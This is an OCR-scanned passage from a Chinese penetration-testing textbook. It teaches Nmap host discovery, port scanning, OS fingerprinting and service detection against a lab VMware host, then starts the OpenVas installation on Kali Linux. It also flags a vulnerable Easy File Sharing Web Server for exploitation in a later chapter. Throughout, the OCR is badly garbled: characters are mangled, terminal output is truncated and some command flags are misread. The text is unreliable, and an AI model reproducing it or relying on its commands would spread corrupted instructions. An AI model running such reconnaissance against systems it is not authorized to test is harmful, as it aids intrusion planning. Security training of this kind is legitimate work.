Nmap $ 40 ( https://nmap.org ) at 2017-08-08 21:22 EDT 
iue 8 pi Pus 169.131 
ost iet up (0. aooo s x ncy). 


own Srt S 
STATE SERVICE 
S 


00:0C:29:2D:7F:89 (VMware) 





repo 
99] c 
open 
open 
open 
open 
open 
open 
open 
open 
open 
ress: 
4x 
# 


IP a s (1 host up) s ned in 1.96 seconds 
ji 


图 4-9 ”使 用 ARP 协 议 对 目标 在 线 状 态 扫描 的 结果 


上 例 中 我 们 对 IP 地 址 为 192.168.169.131 的 设备 是 否 为 活跃 设备 进行 
了 了 检测， 根据 结 果 可 以 看 人 到 “Host is up". 这 说 明 主机 为 活跃 主机 ， 而 有 
下 方 给 出 了 192.168.169.131 设 备 的 物理 地 址 (D8:FE:E3:B3:87:A9) 。 


E 但 是 注意 这 种 扫 摘 方式 仅 能 用 于 与 Nmap 所 在 主机 在 同一 子 网 的 目 
不 。 


4. 使 用 TCP 协 议 进 行 主 机 发 现 


ind dmi a i 主动 端 先 发 送 SYN 报 文 ， 被 
动 端 回 应 SYN+ACK 报 文 ， 然 后 主动 端 再 回应 ACK。 利 用 这 个 过 程 ， 
人 ap 站 目标 发 送 SYN 报 文 ， 如 果 对 方 回 应 了 SYN+ACK， 则 说 明 目 标 在 
由 于 三 次 握手 中 的 最 后 一 步 意 义 不 大 ， 所 以 扫 摘 的 时 候 ， 这 一 步 可 
以 完成 也 可 以 不 完成 ， 如 果 完 成 的 话 我 们 一 般 称 之 为 全 开 CConnect 
扫描 ， 如 果 这 一 步 不 完成 的 话 一 般 称 之 为 半 开 〈SYN) AH. 


Nmap 里 面 采 用 -sS 来 将 扫 摘 设 定 为 半 开 扫 搞 。 


语法 规则 ，nmap -sS [目标 ] 


图 4-10 给 出 了 扫 接 的 结果 。 


root@kali: ~ o oo0 


File Edit View Search Terminal Help 
:-4 nmap -sS 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 22:16 EDT 
Nmap scan report for 192.168.169.131 
Host is up (0.00045s latency). 
Not shown: 991 closed ports 

STATE SERVICE 

open msrpc 

open netbios-ssn 

open microsoft-ds 

open unknown 

open unknown 

open unknown 

open unknown 

open unknown 

open unknown 
MAC Address: 00:0C:29:2D:7F:89 (VMware) 


address (1 host up) scanned in 1.52 seconds 





图 4-10 XF HERRERAS ETT HET 3H RT 28 2 
ARS HI RT. nIUMSERIAZUUCST. 


语法 规则 ，nmap -sT [目标 ] 


图 4-11 给 出 了 扫 摘 的 结 


root@kali: ~ o © Q0 
File Edit View Search Terminal Help 
# nmap -sT 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 22:20 EDT 
Nmap scan report for 192.168.169.131 
Host is up (0.00041s latency). 

: 991 closed ports 

STATE SERVICE 

open msrpc 

open netbios-ssn 

open microsoft-ds 

open unknown 

open unknown 

open unknown 

open unknown 

open unknown 

open unknown 

: 00:0C:29:2D:7F:89 (VMware) 


address (1 host up) scanned in 2.30 seconds 





图 4-11 ”对 目标 的 在 线 状 态 进 行 全 开 扫 插 的 结 


这 两 种 扫描 方式 中 ， 闭 开 扫 描 古 最 为 钟 用 的 ， 因 为 这 种 扫 拍 方式 耗 
时 较 短 ， 而 且 也 不 容易 被 目标 的 日 志 所 记录 。 


5. 使 用 UDP 协 议 进行 主机 友 现 


UDP 协议 相 比 TCP 徐 单 ， 但 是 进行 扫 拉 时， 并 不 如 TCP 协 议 方便 ， 
而 且 论 颖 的 时 间 很 长 ， 因 此 这 种 扫 搬 方式 并 不 第 用 。 


如 果 使 用 UDP 协 议 扫 搬 ， 可 以 使 用 参数 -sU。 


语法 规则 ，nmap -sU [目标 ] 


root@kali:# nmap -SU 192.168.169.131 


图 4-12 给 出 了 扫 拉 的 结果 。 


root@kali: ~ 0o00 
File Edit View Search Terminal Help 
:~# nmap -sU 192.168.169.131 


Starting Nmap 2 E A https://nmap.org ) at 2017-08-09 00:26 EDT 
r 192.168.169.131 


udp oper 
138/udp aHan ITAL taria netbios- pe 
500/u UE Ri ae isakmp 
1900/ud j ed upnp 
4500/u TUR rae Ti area nat - em ike 
5355/udp open|filtered llmn 
MAC Address: 00:0C:29:2D:7F:89 (VMware) 





Nmap done: 1 IP address (1 host up) scanned in 392.90 seconds 
2 38 


图 4-12 ”对 目标 的 在 线 状 态 使 用 UDP 协议 进行 扫描 的 结 
可 以 看 到 ， 这 次 扫描 花费 了 392.90s， 远 远 超 过 了 其 他 的 扫描 方式 。 


43 使 用 Nmap 进 行 端口 发 现 


如 果 我 们 把 每 一 人 台 网 络 设备 看 做 是 一 间 房 子 的话 ， 那 么 这 间 房 子 应 
该 有 能 够 进去 和 出 来 的 出 入 口 ， 不 过 一 般 的 房子 只 有 一 个 出 入 口 ， 这 些 
出 入 口 是 供 人 们 进出 房子 使 用 的 。 但 是 每 个 网 络 设备 却 有 很 多 个 出 入 
口 ， 最 多 可 以 达到 65 536 (219) 个 ， 而 这 些 出 入 口 是 供 数据 进出 网 络 设 
备 的 。 


设 并 响 口 的 目的 其 实 束 是 实现 了 “一 机 多 用 *， 这 里 我 们 先 来 假设 如 
来 没有 病 口 这 个 拉 术 的 话 ， 那 么 一 台 主 机 通常 束 只 能 运行 一 种 网 络 服 务 
了 了 ， 忆 是 只 有 一 个 程序 进行 网 络 通 讯 ， 那 么 只 会 有 一 个 病 口 ， 甚 至 也 就 
没有 闯 口 这 个 概 全 了 。 正 因为 有 很 多 并 且 将 有 更 多 的 程序 要 通过 网 络 进 
行 通 讯 ， 而 所 有 信息 实际 上 痢 要 由 网 卡 那 一 个 接口 出 入 ， 那 么 如 何 区 分 
出 入 的 信息 是 给 哪个 程序 使 用 的 呢 ? 这 个 任务 区 由 操作 系统 处 理 ， 而 它 
所 采用 的 机 制 就 是 分 了 65536 个 端口 编号 ， 程 序 在 发 送 的 信息 中 加 入 端 
口 编写 ， 而 操作 系统 在 接收 到 信息 后 会 控 照 器 口 号 将 信息 分 流 到 当前 内 
存 中 使 用 该 并 口号 的 程序 。 


那么 如 果 我 们 和 希望 能 目 由 出 入 目标 的 话 ， 首 先 得 找到 目标 上 的 出 入 
O, Eii im O o 


RR, Aim USD. BARAI RAFIKI mH x 
我 们 能 够 使 用 的 出 入 口 。 我 们 可 以 使 用 Nmap 找 到 目标 上 开放 有 的 问 口 。 
而 Nmap 对 目标 的 器 口 进行 扫 朱 时 ， 对 交口 状态 的 判断 有 以 下 5 种 。 


e open, MATRE HS TCP 连接 或 者 UDP 报 文 。 

e closed， 大 闭 的 新 口 对 于 nmap 也 是 可 访问 的 ， 它 接收 nmap 探 击 报 文 
并 作出 啊 应 ， 但 没有 应 用 程序 在 其 上 监听 。 

e filtered, FH T- EXE JE BH. LE TRU RENA mO, nmap IEMA xe V rmi LI 


征 售 开放 。 过 滤 可 能 来 目 专 业 的 防火 场 设 备 ， 路 由 规则 或 者 主机 上 
的 软件 防火 墙 。 

e Unfiltered， 未 被 过 波状 态 意 味 痢 中 口 可 访问 ， 但 是 nmap 无 法 确定 它 
征 开放 还 是 关 团 。 上 只 有 用 于 映射 防火 场 规 则 集 的 ACK AAT RIE 
半 口 分 类 到 这 个 状态 。 

e open | filtered， 无 法 确定 端口 是 开放 还 是 被 过 滤 ， 开 放 的 奖 口 不 啊 
应 就 是 一 个 例子 。 


对 端口 的 扫描 一 般 使 用 TCP 协 议 ， 但 是 一 台 主 机 上 有 65 536 个 端 
口 ， 如 果 对 全 部 这 些 端口 都 进行 扫描 的 话 ， 那 么 花费 的 时 间 将 会 是 相当 
长 的 ， 所 以 Nmap 默 认 扫 摘 的 端口 只 是 65 536 中 最 为 常用 的 1000 个 端口 。 
换 句 话说 ， 如 果 我 们 不 加 任何 参数 的 话 ，Nmap 扫 描 的 端口 是 1000 个 ， 
而 不 是 65 536 个 。 


1. jdm 


ARI P8 H65 536 个 靖 口 扫 持 ， 可 以 使 用 参数 -p "*"。 


语法 规则 ，nmap-p "*" [目标 ] 


root@kali:# nmap-p  "*" 192.168.169.131 





84-1325 E Y AAR o 


root@kali: ~ o o o0 


File Edit View Search Terminal Help 
:-4 nmap -p "*" 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-09 01:20 EDT 
Nmap scan report for 192.168.169.131 
Host is up (0.00034s latency). 

Not shown: 8265 closed ports 

PORT STATE SERVICE 

80/tcp open http 

135/tcp open msrpc 

139/tcp — open netbios-ssn 

443/tcp open https 

445/tcp open microsoft-ds 

49152/tcp open unknown 

49153/tcp open 

49154/tcp open 

49155/tcp open 

49156/tcp open 

49157/tcp open known 

MAC Address: 00:0C:29:2D:7F:89 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 50.03 seconds 
:~# 





图 4-13 06] H PREJEMA im 3384 3T £8 R 


扫 拉 的 结 朱 分 成 3 列 ， 第 一 列 是 器 口 的 编号 ， 第 二 列 是 状态 Copen 


或 者 closed) ， 第 三 列 是 运行 的 服务 。 
2. 扫描 前 n 个 端口 


如 果 只 想 扫 摘 使 用 频 京 最 高 的 n 个 问 口 ， 可 以 使 用 参数 --top-ports 


语法 规则 : nmap--top-ports n [目标 ] 
例如 我 们 要 检测 目标 开放 的 使 用 频 这 最 蜗 的 那 10 个 问 口 ， 可 以 使 用 


如 下 命令 : 


root@kali:# nmap --top-ports 10 192.168.169.131 


KjA-1425 E Y HAAR o 


root@kali: ~ o © Q 
File Edit View Search Terminal Help 
:~# nmap --top-ports 10 192.168.169.131 





Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-09 01:26 EDT 
Nmap scan report for 192.168.169.131 
is up (0.00025s latency). 
STATE SERVICE 


closed telnet 

closed smtp 
http 

closed pop3 


cp open 
3389/tcp closed ms-wbt-server 
MAC Address: 00:0C:29:2D:7F:89 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds 
4 国 


图 4-14 o Hodie H3 E 107] mi O REITH 10] £68 ZR 
RITE UAR H P i76 HE 107] 38 DESEAS e 
3. jii Em LI 
如 末 我 们 只 对 指定 的 决口 进行 测试 的 证 ， 可 以 使 用 参数 -p。 
语法 规则 : nmap -p”[ 并 口号 ] [目标 ] 
例如 我 们 要 对 目标 的 80 端 口 进 行 测试 的 话 : 


root@kali:# nmap -p 80 192.168.169.131 


KjA-1525 E Y AMAR o 


root@kali: ~ o o o0 
File Edit View Search Terminal Help 
:~# nmap -p 80 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-09 01:47 EDT 
Nmap scan report for 192.168.169.131 

Host is up (0.00035s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:2D:7F:89 (VMware) 





Nmap done : P address (1 host up) scanned in 0.20 seconds 


图 4-15 ”对 目标 的 80 端 口 进行 扫描 的 结果 


44 使 用 Nmap 扫 持 目 标 操作 系统 


目标 的 操作 系统 类 型 是 一 个 十 分 重要 的 信息 ， 如 果 我 们 知道 了 目标 
所 使 用 的 操作 系统 之 后 束 可 以 大 大 减 小 工作 量 。 例 如 我 们 知道 了 目标 系 
统 为 Windows XP. JI LA BETTE PX Linux 45 ZEB 838 30] 7; 
法 了 。 同 样 如 果 目 标 系 统 为 Windows 10， 那 么 之 前 的 MS08 一 067 这 些 针 
对 Windows XP 系统 的 渗透 模块 也 就 不 需要 测试 了 。 通 党 ， 越 老 旧 的 系 
统 也 束 意 味 着 越 容 易 被 渗透 ， 所 以 我 们 在 进行 渗透 测试 的 时 候 往 往 希 望 
能 找到 目标 网 络 中 那些 比较 老 的 系统 。 


其 实 有 很 多 著名 的 工具 都 捉 供 了 远程 对 操作 系统 进行 检测 的 功能 ， 
这 一 氮 用 和 在 入 侵 上 融 可 以 成 为 墨客 的 工具 ， 而 用 在 网 络 官 理 上 融 可 以 进 
行 资产 管理 和 操作 系统 补丁 管理 。 你 可 以 使 用 Nmap 在 网 络 上 找到 那些 
己 经 过 时 的 系统 或 者 未 经 授权 的 系统 。 


但 是 并 没有 一 种 工具 可 以 同 你 提供 绝对 准确 的 远程 操作 系统 信息 。 
几乎 所 有 的 工具 都 是 使 用 了 一 种 “ 猜 > 的 方法 。 当 然 这 不 是 凭空 的 猜测 ， 
而 是 通过 癌 目 标 发 送 探 针 ， 然 后 根据 目标 的 回应 来 猜测 系统 。 这 个 探 针 
大 都 是 以 TCP 和 UDP 数据 包 的 形式 ， 检 得 的 细节 包括 初始 序列 号 

(ISN) 、TCO 选 项 、 了 下 标识 符 GD) 数字 时 间 惟 、 显 示 拥 塞 通知 
(ECN) 、 窗 口 大 小 等 。 每 个 操作 系统 对 于 这 些 探 针 都 会 做 出 不 同 的 响 
应 。Nmap 将 这 些 啊 应 特征 提取 出 来 并 记录 在 一 个 数据 库 中 ， 这 就 古 
Nmap 进 行 识别 的 原理 。 探 针 和 啊 应 特征 的 对 应 关系 存 放 在 map 安 装 日 录 
HNmap-os-db 文 件 中 。Nmap 会 笠 试 去 验证 如 下 参数 : 


e 操作 系统 供应 商 的 名 字 ， 比 如 微软 或 者 sun。 

e 操作 系统 的 名 字 ， 比 如 Windows、Mac OS X. Linux. 

。 操作 系统 的 版 本 ， 比 如 XP、2000、2003、2008。 

e 当 闻 设备 的 类 型 ， 比 如 通用 计算 机 、 打 印 服务 右 、 娩 体 播 放 右 、 路 


由 器 、WAP 或 者 电力 装置 。 


除了 这 些 参数 以 外 ， 操 作 系统 检测 还 提供 了 关于 系统 运行 时 间 和 
TCP 序 列 可 预测 性 信息 的 分 类 ， 在 命令 行 中 使 用 -O 参 数 通过 端口 扫描 来 
完成 对 操作 系统 的 扫描 。 


语法 规则 : nmap -O”[ 目 标 ] 

例如 我 们 要 对 目标 的 操作 系统 进行 测试 的 话 : 
root@kali:# nmap -O 192.168.169.131 

图 4-16 给 出 了 扫 插 的 结 


:~# nmap -0 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-09 01:52 EDT 
Nmap scan report for 192.168.169.131 

up (0.00026s latency). 

osed ports 


‘STATE SERVICE 


989 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 

p 


cp o 
MAC Address: 
evice pe: generalt purpose 

Running: Microsoft Windows 7|2008|8.1 
Ü : TT z - 


5 (rE. Cpe:/0:micrOo - QOWS /::- cpe:/o:microsoft:windows 7::spl cpe:/o:microsoft: 
etails: Microsoft Windows 7 SPO - SP1, Windows Server 2008 SP1, Windows Server 2008 
t ista - hop 





ect results at https://nmap.org/submit/ 
87 seconds 





图 4-16 ”对 目标 的 控 作 系统 进行 扫 拉 的 结 


根据 Nmap 扫 摘 的 结果 ， 目 标的 操作 系统 可 能 为 Windows 7、 
Windows 2008 或 Windows 8.1 中 的 一 种 。 


45 ”使 用 Nmap 扫 描 目 标 服 务 


相对 操作 系统 而 言 ， 那 些 安 疼 在 操作 系统 之 上 的 软件 更 是 网 络 安全 
的 重 灾区 。 所 以 在 对 目标 进行 渗透 测试 的 时 候 ， 要 尽量 地 检 训 出 目标 系 
统 运行 的 各 种 软件 。 


和 Nmap 扫 摘出 目标 系统 上 运行 的 服务 和 
KIF o 


在 这 里 ， 有 的 谈 者 可 能 会 有 些 奇 怪 ， 在 之 前 的 操作 中 ， 我 们 并 没有 
使 用 Nmap 进 行 服务 识别 操作 ， 但 是 也 得 到 了 服务 类 型 的 信息 。 这 其 实 
很 简单 ， 我 们 知道 一 般 情 况 下 ，ftp 服 务 是 运行 在 21 端 口 的 ，http 是 80 端 
口 ， 诸 如 这 些 端口 都 是 周知 (well-know) 端口 。 我 们 在 进行 Nmap 端 口 
扫描 时 ，Nmap 并 没有 进行 服务 的 识别 ， 而 是 将 并 口号 在 目 己 的 并 口服 
务 表 数 据 库 中 进行 查找 ， 然 后 返回 告诉 你 一 般 情 况 下 ， 这 个 病 口 开放 的 
服务 是 这 个 ， 也 就 是 说 ， 这 种 返回 的 服务 只 是 数据 库 中 的 ， 并 非 事实 中 
半 口 所 运行 的 服务 ， 只 是 一 般 情 况 下 大 家 都 会 使 用 固定 的 交口 进行 固定 
的 服务 。 那 如 果 要 进行 更 精确 的 服务 检测 呢 ? Nmap 提 供 了 更 精确 的 服 
务 及 版 本 检测 选项 。 我 们 通过 添加 选项 -sV 来 进行 服务 和 版 本 识别 ， 服 
务 和 版 本 识别 还 有 更 多 的 选项 。 


e EAE mH, SAU BU, PTSHSYNITdB. 

e 进行 服务 识别 ， 及 送 探 针 报 文 ， 得 到 返回 确认 值 ， 确 认 服 务 。 

° zc. RIER, RRE AIIE, DNT tA HR 
务 的 版 本 。 


把 Nmap 指 同一 个 远程 机 右 ， 它 可 能 告诉 你 病 口 25/tcp、80/tcp 和 
53/udp 是 开放 的 。 使 用 包含 大 约 2200 个 著名 的 服务 的 nmap-services 数 据 
库 ，Nmap 可 以 报告 那些 端口 可 能 分 别 对 应 于 一 个 邮件 服务 器 (SMTP) 


Web 有 上 服务器 (HITP) 和 域名 服务 器 (DNS)。 这 种 查询 通常 是 正确 的 SEE 
上 ， 绝 大 多 数 在 TCP 问 口 25 监 听 的 守护 进程 是 邮件 服务 右 。 然 和 而， 我 们 
DREE EIER A CM]. 很 多 人 完全 可 以 在 一 些 奇怪 的 端口 上 运行 服 
FY o 

即使 Nmap 是 对 的 ， 假 设 运行 服务 的 确实 是 SMTP、HTITP 和 DNS， 
这 也 不 是 特别 详细 的 信息 。 当 为 你 的 公司 或 者 客户 作 安 全 评估 (或 者 甚 
至 集 单 的 网 络 明 细 清 单 ) 时 ， 你 需要 知道 正在 运行 什么 邮件 和 域名 服务 
癸 以 及 它们 的 版 本 。 有 一 个 精确 的 版 本 号 对 了 解 服务 左 有 什么 漏洞 有 巨 
大 帮助 。 而 版 本 探测 可 以 帮助 你 获得 该 信息 。 


在 用 作 种 其 他 类 型 的 扫 插 方法 肥 现 TCP 和 /或 UDP 端 口 后 ， 版 本 探 
训 会 询问 这 些 闯 口 ， 确 定 到 展 什 么 服务 正在 运行 。nmap-service-probes 
数据 库 包 含 查 询 不 同 服务 的 探测 报 文 和 解析 识别 啊 应 的 匹配 表达 式 。 

当 Nmap 从 某 个 服务 收 到 啊 应 ， 但 不 能 在 数据 库 中 找到 岂 配 时 ， 它 
束 打 印 一 个 特殊 的 fingerprint 和 一 个 URL 给 使 用 者 提交 ， 如 果 使 用 者 确 
实 知 道 什 么 服务 运行 在 问 口 ， 那 么 就 可 以 花费 几 分 钟 提 交 这 份 报告 ， 从 
而 让 Nmap 更 加 完善 。 

使 用 下 列 参 数 可 打开 和 控制 版 本 探测 。 

语法 规则 : nmap -sV [目标 ] 

例如 我 们 要 对 目标 上 运行 的 服务 和 软件 进行 测试 的 话 : 


El4-1725 Hi Y THE HJ 


File Edit View Search Terminal 


root(Qkali: ~ 


Help 


:~# nmap -sV 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 22:39 EDT 
Nmap scan report for 192.168.169.131 
Host is up (0.00024s latency). 


Not shown: 989 closed ports 


STATE SERVICE 


open 
open 
open 
open 
open 


open 
open 
open 
open 
open 
open 


http 
msrpc 


netbios-ssn 


ssl/https 


microsoft-ds 


msrpc 
msrpc 
msrpc 
msrpc 
msrpc 
msrpc 


VERSION 

Easy File 
Microsoft 
Microsoft 
Easy File 
Microsoft 


Microsoft 
Microsoft 
Microsoft 
Microsoft 
Microsoft 
Microsoft 


Sharing 
Windows 
Windows 
Sharing 
Windows 


Windows 
Windows 
Windows 
Windows 
Windows 
Windows 


unrecognized despite returning data. 


Web Server httpd 6.9 


RPC 


netbios-ssn 
Web Server SSL v6.9 


JE 


RPC 
RPC 
RPC 
RPC 
RPC 
RPC 


10 microsoft-ds (workgroup: W 


If you know the service/version, 


please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?n 
-service : 
-Port443-TCP:V=7 . 40%T=SSL%I=7%D=8/8%Time=598A75F9%P=i686-pc-linux-gnu%r( 
:GetRequest, 315A, "HTTP/1\ .0\x20200\x200K\r\nSet-Cookie:\x20SESSIONID=-1\ 
:X20\r\nServer:\x20Easy\x20File\x20Sharing\x20Web\x20Server\x20SSL\x20v6 


:\.9\r\nContent-Type:\x20text/html\r\nContent-Length:\x2012447\r\nLast-M 
:odified:Nx20Fri,NVx2011Nx20MayNx202012Xx2010: 11: 48M x20GMTV rXnN rNn« ! DOCTY 
: PEXX20HTMLNx20PUBLICNx20V " - / /W3C/ /DTDNXx20HTMLNx204A . 01Nx20Transitional/ 
: /ENNV"»«htmlNx20di r2 V" ltrV"»«head»NrNn«metaNx20http -equiv-V "Content - Type 
:N"Ax20content2 V" text/html; Vx20charset-iso-8859-1V"»XrNXnemetaNx20http- eq 
:uiv2XV" Content -Style-TypeV"NXx20content-z V" text/cssV"»XrVn«! - -Ax20noNx20ca 
: che\x20headers\x20-->\r\n<meta\x20http-equiv=\"Pragma\"\x20content=\"no 
: -cache\">\r\n<meta\x20http-equiv=\"no-cache\">\r\n<meta\x20http-equiv=\ 
: "Expires\"\x20content=\"-1\">\r\n<meta\x20http-equiv=\"Cache-Control\"\ 
:X20content=\"no-cache\">\r\n<! --\x20end\x20no\x20cache\x20headers\x20- - 
:>\r\n<title>Login\x20-\x20powered\x20by\x20Easy\x20File\x20Sharing\x20W 
:eb\x20Server</title>\r\n\r\n<style\x20type=\"text/css\">\r\n\r\n/\*\x20 
:General\x20page\x20style\.\x20The\x20scroll\x20bar\x20colours\x20only\x 
:20visible\x20in\x20IE5\.5\+\x20\*/\r\nbody\x20{\r\n\tbackground-color:\ 
:X20#e5e5e5;\r\n\tscrollbar-face-color:\x20#E8ECF4;\r\n\tscrollbar-highl 
:ight-color")&r(FourOhFourRequest, 70,"HTTP/1\.0\x20400\x20Bad\x20Request 
:\r\nServer :\x20Easy\x20File\x20Sharing\x20Web\x20Server\x20SSL\x20v6\.9 
:\r\nDate :\x20Wed , \x2009\x20Aug\x202017\x2010:39:57\x20GMT\r\n\r\n"); 


MAC Address: 00:0C:29:2D:7F:89 (VMware) 


Service Info: Host: WIN-N8GQG18FRTI; 0S: Windows; CPE: cpe:/o:microsoft:windows 


Service detection performed. Please report any incorrect results at https://nmap 


.org/submit/ . 





Nmap done: 1 IP address (1 host up) scanned in 155.33 seconds 
:~# 


图 4-17 对 目标 上 运行 的 服务 和 软件 进行 扫 手 的 结 


这 里 我 们 友 现 了 目标 主机 上 运行 的 服务 ， 也 知道 了 这 些 软 件 ， 可 以 
发 现 目 标 主机 上 上 80 新 口上 运行 看 一 个 名 为 “Easy File Sharing Web Server 
httpd” 的 软件 ， 版 本 为 6.9。 记 住 这 个 软件 ， 我 们 在 后 面 的 章节 中 还 会 利 


用 这 个 信息 。 


RA n5 22 T Nmapi-Hif8 JG AR DAT XES7K , Nmap Sc tr AP DIA Xx 
er 介绍 其 中 最 为 昭 用 的 一 种 格式 。 目 前 最 为 流行 的 格式 是 
XML 人 格式 。 


使 用 下 列 参数 可 将 扫 摘 的 结果 保存 为 XML 格式 。 
语法 规则 : nmap -oX [目标 ] 
例如 我 们 要 对 目标 扫 摘 结果 保存 为 XML 格式 的 话 : 


图 4-18 给 出 了 扫 摘 的 结果 。 


:~# nmap -oX Report.xml 192.168.169.131 
ap 7.40 ( https://nmap.org ) at 2017-08-09 02:17 EDT 
eport for 192.168.169.131 
'STATE SERVICE 
open http 
open msrpc 
open netbios 
n https 
microsoft-ds 
n 


nown 
:29:2D:7F:89 (VMware) 


989 
p 
pe 
pe 
ope 
open 
open 
open 
open 
open 
open 
op 
ress: 
sol 
:~# 





图 4-18 ”将 扫 手 的 结 来 你 存 为 XML 格 式 


目前 XML 是 一 种 最 为 流行 的 报告 格式 。 


47 小 结 


在 本 章 中 ， 我 们 以 Nmap 作 为 工具 ， 详 细 地 介绍 了 主动 扫 摘 的 各 种 
方法 。 从 Nmap 的 基础 用 法 开始 ， 逐 步 介 绍 了 如 何 使 用 Nmap 对 目标 的 在 
线 状态 、 疾 口 开放 情况 、 操 作 系 统 、 运 行 的 服务 和 软件 进行 扫 摘 。 主 动 
扫描 的 工具 其 实 很 多 ， 在 Kali Linux 2 中 就 提供 了 多 达 数 十 种 ， 但 是 最 为 
优秀 的 扫描 工具 却 非 Nmap 莫 属 。 


Nmap 功 能 极为 强大 ， 提 供 了 数 十 种 的 扫 摘 技术。 新 版 本 的 Nmap 还 
实现 了 NSE 脚 本 编号 ， 极 大 地 扩充 了 Nmap 的 功能 。 这 些 功 能 极为 强大 
而 实用 ， 作 为 和 Metasploit 相 并 列 的 渗透 行业 两 大 神器 之 一 ， 要 摘 述 
Nmap 的 强大 功能 需要 大 量 的 篇 幅 ， 读 者 如 果 和 希望 能 够 深入 了 解 Nmap， 
可 以 参考 《 诸 神 之 眼 一 Nmap 网 络 安全 审计 技术 揭秘 》。 
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扫 拉 阶段 ， 我 们 要 对 目标 进行 扫 摘 来 及 现 这 个 目标 是 人 否 存 在 东 种 漏洞 ， 
这 个 了 段 对 工具 的 依赖 性 最 强 ， 因 为 目前 世界 上 已 知 的 各 种 版 本 的 操作 
系统 束 有 几 十 种 ， 常 见 软 件 大 概 有 几 干 种 。 这 些 操作 系统 和 软件 上 面 的 
漏洞 更 是 不 计 其 数 ， 如 末 依 知人 工 来 对 目标 是 售 人 存在 茶 种 漏 调 进行 逐个 
的 分 析 是 极为 不 现实 的 。 


因此 对 于 渗透 测试 者 来 说 ， 一 个 优秀 的 漏洞 扫 摘 吉 是 必 不 可 少 的 。 
漏洞 扫 摘 缉 通 利 是 由 两 个 部 分 组 成 的 ， 一 个 是 进行 扫描 的 引擎 部 分 ， 另 
外 一 个 是 包含 了 世界 上 大 多 数 系统 和 软件 漏洞 特征 的 特征 库 。 和 其 他 类 
型 的 测试 工具 不 同 ， 汤 将 扫 接 占 大 都 是 了 商业 软件 。 这 一 点 也 很 容易 理 
解 ， 因 为 世界 上 每 天 都 会 发 现 新 的 漏洞 ， 如 果 没 有 专业 化 团队 长 期 维 
护 ， 便 无 法 保证 这 些 漏洞 可 以 极 及 时 地 这 加 到 特征 库 中 。 


谈 到 现在 优秀 的 漏洞 扫 摘 夫 ， 大 概要 数 Rapid7 Nexpose. Tenable 
Nessus 和 OpenVas。 以 我 的 经 验 来 看 ， 这 些 工 具 扫 摘 的 结果 经 第 会 有 较 
大 的 基 寞 性 ， 但 是 3 个 工 其 之 间 并 不 存在 什么 优 务 之 分 。 每 个 工具 在 进 
行 扫描 的 时 候 都 会 存在 一 定 的 误 报 和 漏 报 。 所 以 现在 渗透 测试 业内 一 般 
的 做 法 是 ， 如 条 条 件 多 许 的 话 最 好 是 分 别 使 用 这 些 工 具 都 扫 摘 一 过 。 这 
三 个 工具 中 Rapid7 Nexpose 更 适合 较 大 的 网 络 ，Tenable Nessus 的 价格 相 
对 更 经 济 一 些 ， 这 两 者 都 是 商业 软件 ， 所 以 使 用 起 来 都 相当 容易 上 手 ， 
只 要 你 输入 一 个 耻 地 址 ， 融 能 完成 所 有 的 扫 摘 任务。 而 Openvas 的 配置 
和 使 用 相对 复杂 一 些 ， 但 是 这 是 一 计 免 费 使 用 的 工具 ， 更 适合 个 人 使 
用 。 这 一 章 中 ， 我 们 将 按照 如 下 几 个 方面 来 介绍 在 Kali Linux 2 中 如 何 使 
用 OpenVas。 


e OpenVas Hj z% RUfO Ei 
e 使 用 OpenVas 对 目标 进行 漏洞 扫描 
。 查看 OpenVas 的 扫描 报告 


5.1 OpenVas 的 安 半 和 配置 


目前 的 OpenVas 的 引擎 已 经 发 布 到 了 8.0， 但 是 献 认 的 Kali Linux 2 中 

并 没有 包含 这 个 工具 。 下 和 面 我 们 来 安装 OpenVas (注意 这 个 安装 过 程 可 

E 很 长 的 时 间 ， 而 且 可 能 失败 ， 最 好 在 更 新 前 做 好 虚拟 机 系统 的 
HE, 


" mA 我 们 的 Kali Linux 2 系统 进行 更 新 ， 自 完 来 更 新 系统 的 软件 包 
RI o 


root@kali:~# apt-get update 


sk 0m em 所 以 速度 很 快 ， 更 新 操作 结束 之 后 如 图 5-1 
不 。 


li kali-ro et e [30.5 kB] 
ollin i386 Pa do mii B. 5.4 MB] 


i-rollin 1386 Pac s [147 kB] 
ro aee intr ib 1386 Pa m ges s [192 kB] 





图 5-1 使 用 update 来 更 新 系统 的 软件 包 有 索引 
接 下 来 使 用 dist-upgrade 命 令 对 系统 更 新 ， 注 意 这 里 更 新 命令 使 用 的 


不 是 upgrade， 而 是 distrupgrade。 与 upgrade 不 同 的 是 ，distrupgrade 可 以 
根据 依赖 天 系 的 变化 来 添加 包 和 删除 包 。 


root@kali:~# apt-get dist-upgrade 





整个 更 新 的 过 程 如 图 5-2 所 示 。 





3 4, O 
root@kali: ~ o oo 
File Edit View Search Terminal Help 
apt-get dist-upgrade 

Reading pa ge lists... Done 

Building ( idency ee 

Reading state information... Done 

Calculating upgrade... Done 

The following packages were automatically installed and are no longer required: 
dkms jsql libjs-mochikit linux-headers-4.9.0-kali4-686-pae 
linux-headers-4.9.0-kali4-common linux-headers-686-pae open-vm-tools-dkms 
python-advancedhttpserver python-alembic python-boltons python-cheetah python-dap 
python-editor python-formencode python-geoip2 python-geojson python-icalendar 
python-maxminddb python-mpltoolkits.basemap python-openid python-pampy python-paste 
python-pastedeploy python-pastedeploy-tpl python-pastescript python-pluginbase 
python-pyotp python-scgi python-smoke-zephyr python-tempita python-termcolor 
python-tzlocal 

Use 'apt autoremove' to remove them. 

The following NEW packages will be installed: 
hyperion jsql-injection linux-headers-4.9.0-kali4-686-pae 
linux-headers-4.9.0-kali4-common linux-image-4.9.0-kali4-686-pae python-scandir 
python3-advancedhttpserver python3-alembic python3-blinker python3-boltons 
python3-cffi-backend python3-cryptography python3-dnspython python3-editor 
python3-geoip2 python3-geojson python3-graphene python3-graphene-sqlalchemy 
